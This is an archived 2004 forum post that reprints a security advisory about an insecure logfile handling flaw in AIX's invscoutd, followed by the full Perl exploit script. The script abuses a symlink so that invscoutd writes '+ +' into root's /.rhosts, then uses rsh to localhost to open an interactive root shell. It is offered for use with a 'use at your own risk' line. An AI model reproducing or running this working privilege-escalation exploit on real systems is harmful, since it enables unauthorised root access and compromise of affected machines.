Aix Invscoutd Insecure Logfile Handling Vulnerabil

Full Version: Aix Invscoutd Insecure Logfile Handling Vulnerabil

GovernmentSecurity.org > The Archives > Exploit Articles

ni3_b0om

Mar 27 2004, 11:19 AM

CRITICAL:
Less critical

IMPACT:
Privilege escalation

WHERE:
Local system

OPERATING SYSTEM:
AIX 5.x
AIX 4.x

DESCRIPTION:
Watercloud has reported a vulnerability in AIX, which can be
exploited by malicious, local users to perform certain actions on a
system with escalated privileges.

A user invoking "invscoutd" may specify a logfile as a command line
argument. This may reportedly be exploited to create or overwrite
files with escalated privileges by supplying the path of an arbitrary
file.

The vulnerability has been reported in earlier versions of invscoutd
included in AIX 4.3.3 and AIX 5.1.

NOTE: An exploit has been published, which uses a special attack
vector to gain root privileges on an affected system.

SOLUTION:
Grant only trusted users access to affected systems.

Make sure that the latest version of invscoutd is used.

PROVIDED AND/OR DISCOVERED BY:
Watercloud, XFOCUS Team.

ORIGINAL ADVISORY:
http://www.xfocus.org/exploits/200403/31.html

-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-Create:

2004-03-24 Update: 2004-03-25
Platform: Unix
Size: 1035 Bytes
MD5: 684a30bff440f398eda31f03d373c1d2

#!/usr/bin/perl
# FileName: x_invscoutd.pl
# Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell.
# Tested : on Aix4.3.3 & Aix5.1.
# Some high version of invscoutd is not affected.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-29
# Announce: use as your owner risk!

$LOG="/tmp/.ex/.hello\n+ +\nworld";
$CMD="/usr/sbin/invscoutd";
umask 022;
mkdir "/tmp/.ex",0777;

print "Exploit error on kill process invscoutd !!" ,exit 1
if &killproc() == 0;

symlink "/.rhosts",$LOG;
system $CMD,"-p7321",$LOG; &killproc();
unlink $LOG;
print "\n============\nRemember to remove /.rhosts !!\n";
print "rsh localhost -l root '/bin/sh -i'\n";
print "waiting . . . . . .\n";
system "rsh","localhost","-l","root","/bin/sh -i";

system $CMD,"-p808","/dev/null" ; &killproc();
rmdir "/tmp/.ex";

sub killproc() {
$_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`;
@proc_lst=split;
$ret=kill 9,$proc_lst[1] if $proc_lst[1];
$ret=-1 if ! defined $ret;
return $ret;
}
#EOF

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.